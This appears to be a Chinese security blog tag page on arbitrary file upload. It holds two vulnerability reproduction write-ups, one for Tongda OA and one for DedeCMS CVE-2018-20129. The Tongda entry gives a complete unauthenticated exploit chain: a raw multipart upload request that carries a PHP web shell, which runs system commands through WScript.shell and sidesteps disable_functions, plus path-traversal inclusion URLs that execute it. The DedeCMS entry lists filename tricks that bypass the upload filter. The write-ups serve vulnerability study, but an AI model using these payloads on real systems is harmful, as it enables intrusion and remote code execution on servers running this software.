Tag:任意文件上传

Tag (任意文件上传)'s result:

通达(tongda)OA文件上传和文件包含漏洞重现及分析

0x00 概述 20200317,网上爆出通达oa被利用0day中勒索病毒的消息,官方已出漏洞补丁。 该0day为利用文件上传和文件包含组合利用进行RCE,无须认证。   0x01 影响范围 2013,2013增强版,2015,2016,2017,v11 //补丁只看见v11(2020)有geteway.php(文件包含漏洞)补丁   0x02 漏洞重现 利用v11版本: 文件包含漏洞 http://localhost/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/oa.access.log   文件上传漏洞 上传文件路径在非webroot目录,如: “D:\MYOA\attach\im\2003\ddd.test.jpg” 请求数据包: POST /ispirit/im/upload.php HTTP/1.1 Host: 127.0.0.1 Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.20.0 Content-Length: 633 Content-Type: multipart/form-data; boundary=ee65cd98fdbee896acd30a7b2552b6b5 –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”P” x –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”UPLOAD_MODE” 1 –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”DEST_UID” 1 –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”ATTACHMENT”; filename=”test07.jpg” Content-Type: image/jpeg <?php $command=$_POST[‘cmd’]; $wsh = new COM(‘WScript.shell’); $exec = $wsh->exec(“cmd /c “.$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?> –ee65cd98fdbee896acd30a7b2552b6b5– 再利用文件包含执行php代码 json=%7B%22url%22%3A%22%2Fgeneral%2F..%2F..%2Fattach%2Fim%2F2003%2F1941158481.test07.jpg%22%7D&cmd=whoami 或者这样包含也行 http://127.0.0.1/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../attach/im/2003/1044529275.test09.jpg //实测无法直接执行phpinfo(); 利用windows的com组件绕过disable_function() <?php $command=$_POST[‘cmd’]; $wsh = new COM(‘WScript.shell’); $exec = $wsh->exec(“cmd /c “.$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?>   0x03 修复方案 打补丁   0x04 漏洞分析 PHP Zend 5.4解密php文件即可 文件上传漏洞分析 upload.php:5 $P = $_POST[‘P’]; if (isset($P) || $P != ”) { ob_start(); include_once ‘inc/session.php’; session_id($P); session_start(); session_write_close(); } else { include_once ‘./auth.php’; } 要有P参数否则会经过auth.php登录验证,不为空即可。 $DEST_UID = $_POST[‘DEST_UID’]; $dataBack = array(); if ($DEST_UID != ” && !td_verify_ids($ids)) { $dataBack = array(‘status’ => 0, ‘content’ => ‘-ERR ‘ . _(‘½ÓÊÕ·½IDÎÞЧ’)); echo json_encode(data2utf8($dataBack)); exit;……

dedecms rce cve-2018-20129漏洞重现

一个鸡肋的老洞,具体分析见: https://www.anquanke.com/post/id/168458 https://xz.aliyun.com/t/1976 https://www.jianshu.com/p/b0eb694be4ac   大概原理: 管理员登录,会员功能开启,利用编辑器上传图片过滤不严,正则替换%,*,?等字符为空,可被利用绕过过滤(如zxc.jpg.p%hp,zxc.jpg?ph%p,zxc.jpg.p?hp) //据说要用构造图片马避免渲染失效,但是本人当时好像直接传常规图片马即可……   漏洞文件: select_images_post.php 关键代码: <?php /** * 图片选择 * * @version $Id: select_images_post.php 1 9:43 2010年7月8日Z tianya $ * @package DedeCMS.Dialog * @copyright Copyright (c) 2007 – 2010, DesDev, Inc. * @license http://help.dedecms.com/usersguide/license.html * @link http://www.dedecms.com */ require_once(dirname(__FILE__).”/config.php”); require_once(dirname(__FILE__).”/../image.func.php”); if(empty($activepath)) { $activepath =”; $activepath = str_replace(‘.’, ”, $activepath); $activepath = preg_replace(“#\/{1,}#”, ‘/’, $activepath); if(strlen($activepath) < strlen($cfg_image_dir)) { $activepath = $cfg_image_dir; } } if(empty($imgfile)) { $imgfile=”; } if(!is_uploaded_file($imgfile)) { ShowMsg(“你没有选择上传的文件!”.$imgfile, “-1”); exit(); } $CKEditorFuncNum = (isset($CKEditorFuncNum))? $CKEditorFuncNum : 1; $imgfile_name = trim(preg_replace(“#[ \r\n\t\*\%\\\/\?><\|\”:]{1,}#”, ”, $imgfile_name)); if(!preg_match(“#\.(“.$cfg_imgtype.”)#i”, $imgfile_name)) { ShowMsg(“你所上传的图片类型不在许可列表,请更改系统对扩展名限定的配置!”, “-1”); exit(); } $nowtme = time(); $sparr = Array(“image/pjpeg”, “image/jpeg”, “image/gif”, “image/png”, “image/xpng”, “image/wbmp”); $imgfile_type = strtolower(trim($imgfile_type)); if(!in_array($imgfile_type, $sparr)) { ShowMsg(“上传的图片格式错误,请使用JPEG、GIF、PNG、WBMP格式的其中一种!”,”-1″); exit(); } $mdir = MyDate($cfg_addon_savetype, $nowtme); if(!is_dir($cfg_basedir.$activepath.”/$mdir”)) { MkdirAll($cfg_basedir.$activepath.”/$mdir”,$cfg_dir_purview); CloseFtp(); } $filename_name = $cuserLogin->getUserID().’-‘.dd2char(MyDate(“ymdHis”, $nowtme).mt_rand(100,999)); $filename = $mdir.’/’.$filename_name; $fs = explode(‘.’, $imgfile_name); $filename = $filename.’.’.$fs[count($fs)-1]; $filename_name = $filename_name.’.’.$fs[count($fs)-1]; $fullfilename = $cfg_basedir.$activepath.”/”.$filename; move_uploaded_file($imgfile, $fullfilename) or die(“上传文件到 $fullfilename 失败!”); if($cfg_remote_site==’Y’ && $remoteuploads == 1) { //分析远程文件路径 $remotefile = str_replace(DEDEROOT, ”, $fullfilename); $localfile = ‘../..’.$remotefile; //创建远程文件夹……